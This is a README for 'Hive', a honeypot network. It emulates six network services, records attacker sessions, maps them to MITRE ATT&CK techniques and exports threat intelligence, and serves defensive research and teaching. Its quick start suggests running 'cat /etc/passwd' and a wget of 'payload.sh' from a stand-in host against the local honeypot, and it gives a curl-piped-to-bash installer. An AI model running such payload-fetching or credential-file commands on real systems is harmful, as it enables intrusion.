โโโ โโโ โโโโโโโ โโโโ โโโโโโโโโโโโโโ โโโโโโโ โโโโโโโโโโโโโโโโโโโโ
โโโ โโโโโโโโโโโโโโโโโ โโโโโโโโโโโโโโโ โโโโโโโโโ โโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโ โโโโโโโโโ โโโโโโโโโ โโโโโโโ โโโโโโ โโโโโโโโโ โโโ
โโโโโโโโโโโ โโโโโโโโโโโโโโโโโโโ โโโโโ โโโโโโโโโโโโโโโโ โโโ
โโโ โโโโโโโโโโโโโโโ โโโโโโโโโโโโโโ โโโ โโโ โโโโโโโโโโโโโโ โโโ
โโโ โโโ โโโโโโโ โโโ โโโโโโโโโโโโโ โโโ โโโ โโโโโโโโโโโโโ โโโ 
Multi-protocol honeypot network that simulates six real services, captures attacker behavior, maps to MITRE ATT&CK, extracts IOCs, and visualizes everything through a real-time dashboard.
This is a quick overview. Security theory, architecture, and full walkthroughs are in the learn modules.
- Simulates 6 services: SSH (fake shell with 25+ commands), HTTP (WordPress/phpMyAdmin fakes), FTP (PASV file capture), SMB (negotiate), MySQL (wire protocol), Redis (RESP)
- Captures every attacker interaction: credentials, commands, file uploads, scanning patterns, tool fingerprints
- Maps behavior to 27 MITRE ATT&CK techniques across 8 tactics with single-event and sliding-window detection
- Extracts IOCs (IPs, URLs, domains, user-agents, credentials) with confidence scoring and deduplication
- Exports threat intelligence as STIX 2.1 bundles and firewall blocklists (iptables, nginx deny, plain text, CSV)
- Records SSH sessions in asciicast v2 format, replayable in the browser via xterm.js
- Streams events in real time via WebSocket to a React dashboard with attack maps, MITRE heatmaps, and session replay
git clone https://github.com/CarterPerez-dev/Cybersecurity-Projects.git
cd PROJECTS/advanced/honeypot-network
cp .env.example .env
docker compose -f dev.compose.yml up -dDashboard loads at http://localhost:3000 or the live demo at honeypot-network.carterperez-dev.com. Connect to the SSH honeypot to see your first captured session:
ssh root@localhost -p 2222Use any password. Run commands like ls, cat /etc/passwd, wget http://example.com/payload.sh, and watch events stream into the dashboard.
Tip
This project uses just as a command runner. Type just to see all available commands.
Install: curl -sSf https://just.systems/install.sh | bash -s -- --to ~/.local/bin
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
Attackers โ Hive Backend โ
โ โ
โโโโโโโโ โ โโโโโโโโ โโโโโโโโ โโโโโโโโ โโโโโโโโ โ
โ SSH โโโโโ2222โโโโโโ sshd โ โ httpdโ โ ftpd โ โ smbd โ โ
โClientโ โ โโโโฌโโโโ โโโโฌโโโโ โโโโฌโโโโ โโโโฌโโโโ โ
โโโโโโโโ โ โ โ โ โ โ
โโโโโโโโ โ โโโโดโโโโ โโโโดโโโโ โ
โMySQL โโโโโ3307โโโโโโmysqldโ โredisdโ โ
โClientโ โ โโโโฌโโโโ โโโโฌโโโโ โ
โโโโโโโโ โ โ โ โ
โ โผ โผ โ
โ โโโโโโโโโโโโโโโโโโโ โ
โ โ Event Bus โ (fan-out pub/sub) โ
โ โโโโโโโโโโฌโโโโโโโโโ โ
โ โ โ
โ โโโโโโโดโโโโโโ โ
โ โ Processor โ (4 worker goroutines) โ
โ โ GeoIP โ โ
โ โ MITRE โ โ
โ โ Store โ โ
โ โ Stream โ โ
โ โโโโโโโโโโโโโ โ
โ โ
โ โโโโโโโโโโโโโโโโโโโ โ
โ โ REST API โ Chi router :8000 โ
โ โ WebSocket โ /ws/events โ
โ โโโโโโโโโโโโโโโโโโโ โ
โโโโโโโโโโโโโโโโฌโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ
โโโโโโโโโโโโโโโโดโโโโโโโโโโโโโโโโโโโ
โ Frontend โ
โ React 19 + TypeScript โ
โ Dashboard โข Events โข Sessions โ
โ MITRE Heatmap โข Intel Export โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
| Service | Port | Protocol | Interaction Depth |
|---|---|---|---|
| SSH | 2222 | x/crypto/ssh | Full shell with filesystem, 25+ commands, session recording |
| HTTP | 8080 | net/http | WordPress/phpMyAdmin fakes, scanner detection, vulnerability path traps |
| FTP | 2121 | Raw TCP | AUTH + PASV data channel, file upload capture (1MB cap) |
| SMB | 4450 | Raw TCP | NetBIOS framing + negotiate response, SMB1/SMB2 detection |
| MySQL | 3307 | Raw TCP | Binary wire protocol greeting, auth capture, query handling |
| Redis | 6380 | tidwall/redcon | RESP protocol, PING/AUTH/INFO/CONFIG/SET/GET/KEYS |
Backend: Go 1.25, Chi v5, nhooyr.io/websocket, pgxpool (PostgreSQL), go-redis, zerolog, Cobra CLI
Frontend: React 19, TypeScript, Vite 6, SCSS (OKLCH tokens), TanStack Query v5, Zustand, Recharts, react-leaflet, xterm.js
Infrastructure: Docker Compose, PostgreSQL 17, Redis 7.4, nginx reverse proxy, multi-stage builds
| Endpoint | Description |
|---|---|
GET /api/health |
Health check with version and sensor ID |
GET /api/stats/overview |
Total events, events by service, active sessions |
GET /api/stats/countries |
Event counts by country |
GET /api/stats/credentials |
Top captured username/password pairs |
GET /api/events |
Paginated events with IP filtering |
GET /api/sessions |
Paginated session list |
GET /api/sessions/{id} |
Session detail with commands and techniques |
GET /api/sessions/{id}/replay |
Asciicast v2 recording for session replay |
GET /api/attackers |
Attacker list with geo and tool info |
GET /api/mitre/techniques |
Full technique catalog |
GET /api/mitre/heatmap |
Technique detection counts for heatmap |
GET /api/iocs |
Paginated IOC list |
GET /api/iocs/export/stix |
STIX 2.1 bundle export |
GET /api/iocs/export/blocklist |
Blocklist export (plain, iptables, nginx, csv) |
WS /ws/events |
Real-time event stream |
Hive detects 27 techniques across 8 tactics:
| Tactic | Techniques |
|---|---|
| Reconnaissance | T1595, T1595.002 |
| Initial Access | T1078, T1190 |
| Execution | T1059.004 |
| Persistence | T1053.003, T1543.002, T1098.004 |
| Credential Access | T1110, T1110.001, T1110.003, T1552.001 |
| Discovery | T1082, T1083, T1046, T1018, T1049, T1016 |
| Lateral Movement | T1021.004 |
| Command and Control | T1105, T1071.001 |
| Impact | T1496, T1485, T1489 |
Detection uses two strategies: single-event pattern matching (command โ technique) and multi-event sliding windows (5+ auth attempts in 5 minutes โ T1110 Brute Force, 3+ distinct services in 60 seconds โ T1046 Network Service Discovery).
hive serve # Start all services
hive serve --config hive.yml # Custom config file
hive migrate up # Apply database migrations
hive migrate down # Rollback last migration
hive migrate status # Show migration status
hive keygen # Generate SSH host keyAll settings can be set via YAML config file or environment variables:
| Variable | Default | Description |
|---|---|---|
HIVE_SENSOR_ID |
hive-01 |
Sensor identifier |
HIVE_SSH_ENABLED |
true |
Enable SSH honeypot |
HIVE_SSH_PORT |
2222 |
SSH listen port |
HIVE_HTTP_ENABLED |
true |
Enable HTTP honeypot |
HIVE_HTTP_PORT |
8080 |
HTTP listen port |
HIVE_FTP_ENABLED |
true |
Enable FTP honeypot |
HIVE_FTP_PORT |
2121 |
FTP listen port |
HIVE_SMB_ENABLED |
true |
Enable SMB honeypot |
HIVE_SMB_PORT |
4450 |
SMB listen port |
HIVE_MYSQL_ENABLED |
true |
Enable MySQL honeypot |
HIVE_MYSQL_PORT |
3307 |
MySQL listen port |
HIVE_REDIS_ENABLED |
true |
Enable Redis honeypot |
HIVE_REDIS_PORT |
6380 |
Redis listen port |
HIVE_API_ADDR |
:8000 |
Dashboard API listen address |
HIVE_DB_DSN |
postgres://... |
PostgreSQL connection string |
HIVE_REDIS_URL |
redis://... |
Infrastructure Redis URL |
HIVE_GEOIP_PATH |
data/GeoLite2-City.mmdb |
MaxMind database path |
HIVE_SSH_HOSTKEY_PATH |
data/hostkey_ed25519 |
SSH host key path |
HIVE_LOG_LEVEL |
info |
Log level (debug, info, warn, error) |
honeypot-network/
โโโ cmd/hive/ # CLI entry point
โโโ pkg/types/ # Shared domain types (Event, Session, IOC)
โโโ internal/
โ โโโ sshd/ # SSH honeypot (shell, filesystem, commands)
โ โโโ httpd/ # HTTP honeypot (WordPress, phpMyAdmin fakes)
โ โโโ ftpd/ # FTP honeypot (auth capture, upload logging)
โ โโโ smbd/ # SMB honeypot (negotiate-only)
โ โโโ mysqld/ # MySQL honeypot (wire protocol, query logging)
โ โโโ redisd/ # Redis honeypot (RESP commands)
โ โโโ event/ # Event bus + processor pipeline
โ โโโ store/ # PostgreSQL + Redis persistence
โ โโโ mitre/ # ATT&CK technique detection engine
โ โโโ intel/ # IOC extraction, STIX export, blocklists
โ โโโ api/ # REST + WebSocket dashboard API
โ โโโ ... # config, geo, ratelimit, session, ui
โโโ frontend/ # React 19 + TypeScript dashboard
โโโ migrations/ # PostgreSQL schema (goose format)
โโโ infra/ # Docker, nginx, Redis configs
โโโ learn/ # Learning modules
โโโ compose.yml # Production Docker Compose
| Module | Topic |
|---|---|
| 00 - Overview | Prerequisites, quick start, project structure |
| 01 - Concepts | Honeypot theory, protocol emulation, MITRE ATT&CK, IOC types |
| 02 - Architecture | Event-driven design, data flow, design patterns |
| 03 - Implementation | SSH shell emulation, MySQL wire protocol, FTP state machine |
| 04 - Challenges | Add Telnet/SMTP, deploy to VPS, ML anomaly detection |
SSH host key error on repeated starts
ssh: handshake failed: ssh: no common algorithm for host key
Delete data/hostkey_ed25519 and restart. A new key will be auto-generated.
PostgreSQL connection refused
Make sure the database is running. With Docker: docker compose up -d postgres. Check that PostgreSQL is listening on port 5432.
Frontend WebSocket not connecting
The Vite dev server proxies /ws/* to the backend. Make sure the backend is running on port 8000 before starting the frontend.
This tool is designed for authorized security research and educational purposes. Deploying honeypots on networks you do not own or control may violate local laws and regulations. Before deploying:
- Ensure you have authorization from network owners
- Check your cloud provider's acceptable use policy (some prohibit honeypots)
- Be aware that honeypots collect attacker data, which may include personal information subject to privacy regulations (GDPR, CCPA)
- Do not use captured data for offensive purposes
- If deploying on a public IP, understand that you are inviting connections from potentially hostile actors
The authors are not responsible for misuse of this software.
AGPL 3.0